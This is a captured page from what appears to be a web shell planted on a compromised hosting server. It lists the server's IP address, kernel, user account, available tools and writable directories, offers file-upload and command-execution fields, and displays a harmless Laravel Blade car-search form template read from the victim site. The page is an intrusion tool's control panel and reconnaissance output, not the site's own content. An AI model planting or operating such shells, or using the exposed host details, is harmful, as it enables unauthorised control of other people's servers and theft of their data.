403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.147.56.125
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Car/frontend/layouts/search-map/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Car/frontend/layouts/search-map/form-search-map.blade.php
<form action="{{url( app_get_locale(false,false,'/').config('car.car_route_prefix') )}}" class="form bravo_form d-flex justify-content-start" method="get" onsubmit="return false;">
    @php $car_map_search_fields = setting_item_array('car_map_search_fields');

    $car_map_search_fields = array_values(\Illuminate\Support\Arr::sort($car_map_search_fields, function ($value) {
        return $value['position'] ?? 0;
    }));

    @endphp
    @if(!empty($car_map_search_fields))
        @foreach($car_map_search_fields as $field)
            @switch($field['field'])
                @case ('location')
                    @include('Car::frontend.layouts.search-map.fields.location')
                @break
                @case ('attr')
                    @include('Car::frontend.layouts.search-map.fields.attr')
                @break
                @case ('date')
                    @include('Car::frontend.layouts.search-map.fields.date')
                @break
                @case ('price')
                    @include('Car::frontend.layouts.search-map.fields.price')
                @break
                @case ('advance')
                    <div class="filter-item filter-simple advance-filters">
                        <div class="form-group">
                            <span class="filter-title toggle-advance-filter" data-target="#advance_filters">{{__('More filters')}} <i class="fa fa-angle-down"></i></span>
                        </div>
                    </div>
                @break

            @endswitch
        @endforeach
    @endif



</form>

Youez - 2016 - github.com/yon3zu
LinuXploit